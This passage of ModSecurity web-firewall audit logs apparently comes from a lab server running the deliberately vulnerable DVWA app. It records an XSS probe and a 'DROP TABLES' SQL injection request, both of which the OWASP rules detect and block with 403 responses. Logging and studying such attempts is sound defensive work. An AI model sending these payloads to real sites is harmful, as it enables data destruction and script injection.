\"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2Wn8AAQEAAAkXs@oAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":704,"p2":2487,"p3":111,"p4":516,"p5":78,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:22 --0400","transaction_id":"WRc2fn8AAQEAAAkYuFUAAAAD","remote_address":"192.168.75.153","remote_port":39278,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/xss_s/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"109"},"body":["txtName=%27%27%3B%21--%22%3CXS&mtxMessage=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D&btnSign=Sign+Guestbook"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_s/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: content-length found within ARGS:mtxMessage: '';!--\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected XSS using libinjection. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: content-length found within ARGS:mtxMessage: '';!--\\\\\\\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":460,"p2":4250,"p3":0,"p4":0,"p5":211,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0BsAAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:37:11 GMT","If-None-Match":"W/\"246-54f6a6f09244d\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:38:35 GMT","ETag":"\"26d-54f6a7404e88e\"","Accept-Ranges":"bytes","Content-Length":"621","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2jX8AAQEAAAkZ0BsAAAAE\"]"],"stopwatch":{"p1":391,"p2":995,"p3":54,"p4":135,"p5":49,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0BwAAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2jX8AAQEAAAkZ0BwAAAAE\"]"],"stopwatch":{"p1":579,"p2":1227,"p3":66,"p4":335,"p5":66,"sr":32,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0B0AAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2jX8AAQEAAAkZ0B0AAAAE\"]"],"stopwatch":{"p1":867,"p2":1098,"p3":49,"p4":247,"p5":65,"sr":62,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:13 --0400","transaction_id":"WRc2sX8AAQEAAAkVV5AAAAAA","remote_address":"192.168.75.181","remote_port":46616,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2sX8AAQEAAAkVV5AAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":462,"p2":1963,"p3":114,"p4":375,"p5":78,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:14 --0400","transaction_id":"WRc2sn8AAQEAAAkVV5EAAAAA","remote_address":"192.168.75.181","remote_port":46616,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2sn8AAQEAAAkVV5EAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":427,"p2":1409,"p3":98,"p4":377,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:35 --0400","transaction_id":"WRc2x38AAQEAAAmHBJoAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
